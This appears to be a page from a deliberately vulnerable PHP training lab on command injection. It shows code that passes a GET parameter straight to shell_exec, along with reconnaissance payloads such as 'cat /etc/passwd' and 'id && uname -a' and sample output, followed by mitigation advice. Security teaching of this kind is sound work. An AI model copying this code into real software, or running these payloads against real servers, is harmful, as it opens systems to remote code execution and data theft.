Lab 1: Basic Command Injection

Difficulty: Low

Lab Overview

This lab demonstrates a basic Remote Code Execution vulnerability through command injection. The application directly executes user-supplied commands without any validation or sanitization.

Objective: Execute arbitrary system commands to gain control of the server.

Vulnerable PHP Code

// Handle command execution request
if (isset($_GET['cmd']) && !empty($_GET['cmd'])) {
    $command = $_GET['cmd'];
    
    // Vulnerable: Direct command execution without validation
    try {
        $output = shell_exec($command . ' 2>&1');
        $command_output = $output ?: 'No output';
        // Display output
    } catch (Exception $e) {
        // Error handling
    }
}

// Example vulnerable usage:
// ?cmd=whoami
// ?cmd=ls -la
// ?cmd=cat /etc/passwd
// ?cmd=id && uname -a

Command Execution Demo

Command executed successfully!

Quick Test Commands:

Command Output: ls -la

total 160
drwxr-xr-x  2 kzlabsst kzlabsst  4096 Nov 26 16:46 .
drwxr-x--- 31 kzlabsst nobody    4096 Apr 28 04:13 ..
-rw-r--r--  1 kzlabsst kzlabsst 23576 Nov 26 16:46 0.php
-rw-r--r--  1 kzlabsst kzlabsst 16220 Nov 26 16:46 1.php
-rw-r--r--  1 kzlabsst kzlabsst 17998 Nov 26 16:46 2.php
-rw-r--r--  1 kzlabsst kzlabsst 17816 Nov 26 16:46 3.php
-rw-r--r--  1 kzlabsst kzlabsst 20466 Nov 26 16:46 4.php
-rw-r--r--  1 kzlabsst kzlabsst 25474 Nov 26 16:46 5.php
-rw-r--r--  1 kzlabsst kzlabsst 12796 Nov 26 16:46 index.php
-rw-r--r--  1 kzlabsst kzlabsst    11 Nov 26 16:46 test.txt

Vulnerability Details

Type: Remote Code Execution (RCE)
Severity: Critical
Parameter: cmd
Method: GET
Issue: Direct command execution without validation

Test Commands

Try these commands in the cmd parameter:

whoami - Current user
ls -la - List files
cat /etc/passwd - System users
id && uname -a - User ID and system info
ps aux - Running processes
netstat -tulpn - Network connections

Example URLs:

1.php?cmd=whoami
1.php?cmd=cat /etc/passwd

Quick Test URLs

Click these links to test the vulnerability:

Real-World Attack Scenarios

Complete server compromise and control
Database access and data exfiltration
File system access and manipulation
Network access and lateral movement
Bypassing all security controls
Privilege escalation and persistence
Cryptocurrency mining and botnet participation

Mitigation Strategies

Never use user input in command execution functions
Use parameterized queries and prepared statements
Implement proper input validation and sanitization
Use whitelist-based validation for allowed commands
Implement proper error handling
Use least privilege principles
Implement proper logging and monitoring